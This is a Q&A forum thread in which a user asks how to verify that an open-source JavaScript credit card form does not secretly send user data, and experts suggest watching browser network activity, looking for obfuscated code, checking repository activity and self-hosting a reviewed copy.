how can I check the JS code, if the the JS code inside my page posts or requests any data without my knowledge ?

BR
BR used Ask the Experts™
on
Dear Experts,
I use PHP 7.2 and MySql 5.6,

I found an open source html - javascript html-JS form on Github, which could work perfectly fine for me .

https://github.com/jessepollak/card  The link is here.
I used Javascript version of this form.

This is a credit card form. It's a very useful form. However, I'm new to JS and I know that data can be manuplated with JS.
It can be posted without my knowledge with JS of JQuery and credit card information is a very sensitive data as you can imagine.

I check the JS file, I didn't see any part that POST data or another 3rd party links. How can I be sure that the form is safe and do not send or post any of my users data?

thank you
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
leakim971Multitechnician
Top Expert 2014
Commented:
lookin at the code you should see strange data representing an address, a target URL
you can also check network activity using a web browse, for example Chrome : https://developers.google.com/web/tools/chrome-devtools/network/
Most Valuable Expert 2017
Distinguished Expert 2018
Commented:
Leak's suggestion is good - run the code and check your Network console to see if it triggers any activity.
You have examined the code as well - check for any obfuscation - code that you cannot easily read. While doing this check the scroll bars on the editor - make sure there is no code hiding off screen.

Finally, check the GitHub stats Screenshot_2019-03-10-jessepollak-ca.png
10K stars with 1K forks - says this is an active bit of code. If it were untrustworthy then those stats would not look like that.

Also check the issues section - look for comments in there that might indicate problems with the plugin.

None of the above should qualify as a safety check on its own - you should do all of them as part of your security check.

And finally don't use a remote link for the code - download a version that you have checked and then use that from your server. That way you know that the code on the link won't be tampered with.
BRDigital Marketing

Author

Commented:
thank you both

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial